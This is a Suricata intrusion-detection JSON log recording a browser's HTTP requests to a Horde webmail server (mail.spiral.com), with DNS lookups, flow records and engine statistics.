{"timestamp":"2020-02-29T00:24:57.394760+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/graphics\/blacklist.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/ingo\/themes\/default\/block\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":558},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/graphics\/blacklist.png","state":"CLOSED","stored":false,"size":558,"tx_id":5}} {"timestamp":"2020-02-29T00:24:57.395059+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:24:58.000531+0000","flow_id":943259344790734,"event_type":"flow","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:57.419022+0000","end":"2020-02-29T00:19:57.527637+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:59.000368+0000","flow_id":599515932326705,"event_type":"flow","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:58.719665+0000","end":"2020-02-29T00:19:58.830845+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:59.000883+0000","flow_id":1124622944265220,"event_type":"flow","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":9129,"start":"2020-02-29T00:23:53.222212+0000","end":"2020-02-29T00:23:58.492690+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:59.853152+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/message.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":493},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/message.png","state":"CLOSED","stored":false,"size":493,"tx_id":10}} {"timestamp":"2020-02-29T00:24:59.853519+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262}} {"timestamp":"2020-02-29T00:24:59.968706+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-arrow-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":262},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-arrow-active.png","state":"CLOSED","stored":false,"size":262,"tx_id":11}} {"timestamp":"2020-02-29T00:24:59.969044+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207}} {"timestamp":"2020-02-29T00:25:00.152171+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-subnavi.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":207},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-subnavi.png","state":"CLOSED","stored":false,"size":207,"tx_id":12}} {"timestamp":"2020-02-29T00:25:00.152424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535}} {"timestamp":"2020-02-29T00:25:02.195588+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53130,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:25:02.202811+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":2}} {"timestamp":"2020-02-29T00:25:02.203011+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":3}} {"timestamp":"2020-02-29T00:25:02.206799+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117},"app_proto":"http","fileinfo":{"filename":"\/js\/hordecore.js","state":"CLOSED","stored":false,"size":25017,"tx_id":3}} {"timestamp":"2020-02-29T00:25:02.308566+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59724,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:02.338773+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":13}} {"timestamp":"2020-02-29T00:25:02.400006+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":6}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:02.416686+0000","flow_id":1002950820279638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59724,"proto":"UDP","dns":{"type":"answer","id":53778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:02.472424+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:25:02.559671+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":14}} {"timestamp":"2020-02-29T00:25:02.561541+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:25:02.568769+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":15}} {"timestamp":"2020-02-29T00:25:02.609536+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:25:03.000163+0000","event_type":"stats","stats":{"uptime":15155,"capture":{"kernel_packets":140642,"kernel_drops":0},"decoder":{"pkts":140790,"bytes":96640184,"invalid":195,"ipv4":139205,"ipv6":10,"ethernet":140790,"raw":0,"null":0,"sll":0,"tcp":133643,"udp":5352,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088704},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2447,"failed_udp":116},"tx":{"http":4955,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2531}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2530,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} {"timestamp":"2020-02-29T00:25:05.000558+0000","flow_id":811820461074107,"event_type":"flow","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:04.468667+0000","end":"2020-02-29T00:20:04.579983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:06.898313+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36277,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39043,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:06.930810+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":16}} {"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:07.006537+0000","flow_id":252568494322953,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36277,"proto":"UDP","dns":{"type":"answer","id":39043,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:07.094400+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356}} {"timestamp":"2020-02-29T00:25:07.160564+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4356},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":17}} {"timestamp":"2020-02-29T00:25:07.164197+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:25:07.179831+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":18}} {"timestamp":"2020-02-29T00:25:07.221307+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":19,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} {"timestamp":"2020-02-29T00:25:10.000204+0000","event_type":"stats","stats":{"uptime":15162,"capture":{"kernel_packets":140833,"kernel_drops":0},"decoder":{"pkts":140850,"bytes":96657728,"invalid":195,"ipv4":139263,"ipv6":10,"ethernet":140850,"raw":0,"null":0,"sll":0,"tcp":133697,"udp":5356,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2896,"ssn_memcap_drop":0,"pseudo":353,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2912,"synack":2903,"rst":1218,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1910,"ftp":0,"smtp":0,"tls":780,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2449,"failed_udp":116},"tx":{"http":4961,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2533}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2531,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35584,"memcap":0}}} {"timestamp":"2020-02-29T00:25:12.185232+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":19}} {"timestamp":"2020-02-29T00:25:12.486392+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59784,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:12.665144+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.676492+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:25:12.880834+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.882591+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} 